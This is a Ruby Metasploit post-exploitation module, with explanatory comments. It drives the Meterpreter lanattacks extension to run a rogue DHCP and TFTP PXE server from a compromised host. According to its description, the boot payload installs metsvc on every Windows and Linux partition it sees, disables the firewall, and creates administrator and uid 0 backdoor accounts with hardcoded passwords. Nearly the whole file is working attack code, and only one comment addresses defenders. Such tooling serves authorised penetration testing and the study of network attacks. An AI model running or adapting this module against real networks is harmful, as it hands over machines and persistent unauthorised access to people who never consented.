##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that drives the Meterpreter `lanattacks` extension on an existing
# session to run a DHCP + TFTP (PXE) server from the compromised host. The
# served boot files are read from TFTPROOT (update0 .. update4) and the DHCP
# lease log is polled so each PXE client can be reported as a note.
#
# From a defender's view, the observable artefact is an unexpected DHCP/TFTP
# responder on the local segment; DHCP offers from a host that is not the
# authorised DHCP server are the signal network monitoring should alert on.
class MetasploitModule < Msf::Post
  include Msf::Auxiliary::Report

  # Declares metadata and the advanced options. Every Meterpreter command the
  # module relies on is listed under 'Compat' so the framework can check the
  # session supports them before `run` is called.
  def initialize
    super(
      'Name' => 'Windows Manage PXE Exploit Server',
      'Description' => %q{
        This module provides a PXE server, running a DHCP and TFTP server.
        The default configuration loads a linux kernel and initrd into memory that
        reads the hard drive; placing a payload to install metsvc, disable the
        firewall, and add a new user metasploit on any Windows partition seen,
        and add a uid 0 user with username and password metasploit to any linux
        partition seen. The windows user will have the password p@SSw0rd!123456
        (in case of complexity requirements) and will be added to the administrators
        group.

        See exploit/windows/misc/pxesploit for a version to deliver a specific payload.

        Note: the displayed IP address of a target is the address this DHCP server
        handed out, not the "normal" IP address the host uses.
      },
      'Author' => [ 'scriptjunkie' ],
      'License' => MSF_LICENSE,
      'Platform' => [ 'win' ],
      'SessionTypes' => [ 'meterpreter' ],
      'Compat' => {
        'Meterpreter' => {
          'Commands' => %w[
            lanattacks_add_tftp_file
            lanattacks_dhcp_log
            lanattacks_reset_dhcp
            lanattacks_set_dhcp_option
            lanattacks_start_dhcp
            lanattacks_start_tftp
            lanattacks_stop_dhcp
            lanattacks_stop_tftp
          ]
        }
      }
    )

    # Advanced options. Only RESETPXE is required (it defaults to false);
    # SRVHOST, DHCPIPSTART and DHCPIPEND have no default and are left to the
    # extension to autodetect when unset (see the comment in `run`).
    register_advanced_options(
      [
        OptString.new('TFTPROOT', [
          false, 'The TFTP root directory to serve files from',
          # Default: the framework's bundled data directory for this module.
          File.join(Msf::Config.data_directory, 'exploits', 'pxexploit')
        ]),
        OptString.new('SRVHOST', [ false, 'The IP of the DHCP server' ]),
        OptString.new('NETMASK', [ false, 'The netmask of the local subnet', '255.255.255.0' ]),
        OptBool.new('RESETPXE', [ true, 'Resets the server to re-exploit already targeted hosts', false ]),
        OptString.new('DHCPIPSTART', [ false, 'The first IP to give out' ]),
        OptString.new('DHCPIPEND', [ false, 'The last IP to give out' ])
      ]
    )
  end

  # Entry point. Loads the lanattacks extension if needed, pushes the DHCP
  # options and the five boot files to the session, starts TFTP then DHCP, and
  # then polls the DHCP log every 20 seconds until the user interrupts, at
  # which point both servers are stopped.
  #
  # Raises whatever `File.binread` raises (e.g. Errno::ENOENT) if one of the
  # update0..update4 files is missing from TFTPROOT; this happens before either
  # server is started, so nothing is left running in that case.
  def run
    # The extension is loaded lazily on first use. A reset is only meaningful
    # (and only attempted) when the extension was already loaded on this
    # session, since a freshly loaded extension has no state to clear.
    if !client.lanattacks
      print_status('Loading lanattacks extension...')
      client.core.use('lanattacks')
    elsif datastore['RESETPXE']
      print_status('Resetting PXE attack...')
      client.lanattacks.dhcp.reset
    end

    # Not setting these options (using autodetect)
    # The whole datastore is handed to the extension; it picks out the DHCP
    # related keys (SRVHOST, NETMASK, DHCPIPSTART, DHCPIPEND) itself.
    print_status('Loading DHCP options...')
    client.lanattacks.dhcp.load_options(datastore)

    # Read update0..update4 from TFTPROOT on the framework side and register
    # each under the same name with the TFTP server running in the session.
    0.upto(4) do |i|
      print_status("Loading file #{i + 1} of 5")
      contents = File.binread(::File.join(datastore['TFTPROOT'], "update#{i}"))
      client.lanattacks.tftp.add_file("update#{i}", contents)
    end
    # Order matters: TFTP must be serving before DHCP starts pointing clients
    # at it.
    print_status('Starting TFTP server...')
    client.lanattacks.tftp.start
    print_status('Starting DHCP server...')
    client.lanattacks.dhcp.start
    print_status('PXEsploit attack started')
    # The rescue clause below belongs to the loop's block, so an Interrupt
    # raised anywhere inside one iteration lands in the cleanup path.
    loop do
      # get stats every 20s
      # select with no descriptors and a timeout is used purely as a 20 s wait.
      select(nil, nil, nil, 20)
      # Each log item is a pair: item[0] is the 6-byte client hardware (MAC)
      # address, formatted as colon-separated hex; item[1] is the leased
      # address, rendered with Rex::Socket.addr_ntoa.
      client.lanattacks.dhcp.log.each do |item|
        print_status("Served PXE attack to #{item[0].unpack('H2H2H2H2H2H2').join(':')} " \
                     "(#{Rex::Socket.addr_ntoa(item[1])})")
        # The note stores only the MAC string; the leased IP is printed but
        # not persisted.
        report_note({
          type: 'PXE.client',
          data: item[0].unpack('H2H2H2H2H2H2').join(':')
        })
      end
    rescue ::Interrupt
      # Ctrl-C is the only exit: stop TFTP first, then DHCP, and return.
      print_status('Stopping TFTP server...')
      client.lanattacks.tftp.stop
      print_status('Stopping DHCP server...')
      client.lanattacks.dhcp.stop
      print_status('PXEsploit attack stopped')
      return
    end
  end
end